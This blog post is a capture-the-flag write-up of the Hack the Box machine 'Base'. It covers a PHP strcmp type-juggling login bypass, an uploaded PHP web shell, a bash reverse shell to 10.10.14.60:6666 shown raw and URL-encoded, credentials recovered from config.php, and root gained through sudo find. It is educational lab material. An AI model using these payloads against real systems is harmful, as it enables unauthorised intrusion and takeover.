Post

Base

Posted Updated
By Peter Soverns 4 min read

Overview

Base is a vulnerable machine from Hack the Box that requires some web app enumeration and a unique type juggling with php. The foothold is accomplished after digging into a unique file and digging into a specific function. The privilege escalation is accomplished through a sudo exploitation due to a misconfiguration that allows us to run a specific linux binary as root.

Nmap Scan

sudo nmap -sS -Pn <target ip> -vvv

  • 22/tcp open ssh syn-ack ttl 63
    • OpenSSH 7.6p1 Ubuntu
  • 80/tcp open http syn-ack ttl 63
    • Apache httpd 2.4.29 ((Ubuntu))

Basic Enumeration

Nikto Scan:

  • /: Server may leak inodes via ETags, header found with file /, inode: 99b0, size: 5e0a23270d210, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
  • OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
  • /upload.php?type="<script>alert(document.cookie)</script>: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
  • /login/: Directory indexing found.

Wfuzz Directory Enumeration

  • “login”
  • “assets”

  • “forms”

  • Under assets path:
    • “css”
    • “js”
    • “vendor”
    • “fonts”
  • Under login path:
    • login.php
    • config.php
    • login.php.swp

The swap file is interesting, doing some further digging we find an article that helps explain what they are used for here:

  • Swap files record modifications made to the buffer, serving as a safety net in case of Vim or system crashes, facilitating the retrieval of those alterations. Furthermore, they prevent multiple instances of editors like Vim from concurrently modifying the same file.

We downloaded the swap file to our machine. Some of it contains machine code, but there are a good number of strings we can read. We can strip them out with “strings”, and read the contents.

  • Examining this file, we can see how the web page is set up to evaluate the inputs for the login portal.
    • the strcmp() function is used to compare the input string for username and password
1
2

if (strcmp($username , $_POST['username']) == 0) {
 if (strcmp($password, $_POST['password']) == 0) {
  • We can see that the username and password are both contained in []. If we have the ability to control how these parameters are passed to the server, we can force them to be evaluated as an array, and since the restriction is not set to be ===, we have the possibility of passing any string.
    • Basically, if the data we pass is not empty, due to this bug in php, it will evaluate it to be true, and give us access. A more thorough explanation and video can be found here by IppSec.

To exploit this, we load up BurpSuite and get ready to intercept the login input.

  • The idea is to utilize the comparison of our input to pass it as an array rather than string comparison
  • We changed it to go from username=admin&password=admin to username[]=admin&password[]=admin
  • This gives us acces, and we can see a page that allows us to upload a file.

Foothold

We can pass a simple php file to see if we have the ability to do code execution:

1

<?php echo system($_REQUEST['cmd']);?>
  • Looks like we can get commands to run, we can run id to get which user we are able to access.
    • www-data
  • If we try to get a reverse shell through this method, we may get an error, would be better to swap it to a post request.
  • We can send the following over to get a connection back:
    1

    /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.60/6666 0>&1'

    We will need to url encode this so it is interpreted correctly by the server:

    1

    /bin/bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.60/6666+0>%261'
  • We add the + for the spaces, and the & needs to be converted to %26, which is its equivalent.

Now that we have access to the machine, we can check some files to see if we have any interesting documents.

  • One file has some credentials: /var/www/html/login/config.php
    • admin:thisisagoodpassword
  • We can try to login over ssh to see if this works for admin, or the user on the box, john.

We now have ssh access, which is much more stable and very nice to have. We also now have access to user.txt.

User

Local Enumeration

Running the command sudo -l will show us that we have the ability to run a binary as root: /usr/bin/find.

  • We can check the Gtfobins site here to see if this is possible to be abused to gain root.

Privilege Escalation

Running this command will give us root access: sudo find . -exec /bin/sh \; -quit

  • We have rooted the box, and can now get root.txt.

Root

ctf, security, hacking, exploits, sudo exploitation, arbitrary file upload, authentication bypass, php type juggling
ctf security hacking exploits sudo exploitation arbitrary file upload authentication bypass php type juggling
This post is licensed under CC BY 4.0 by the author.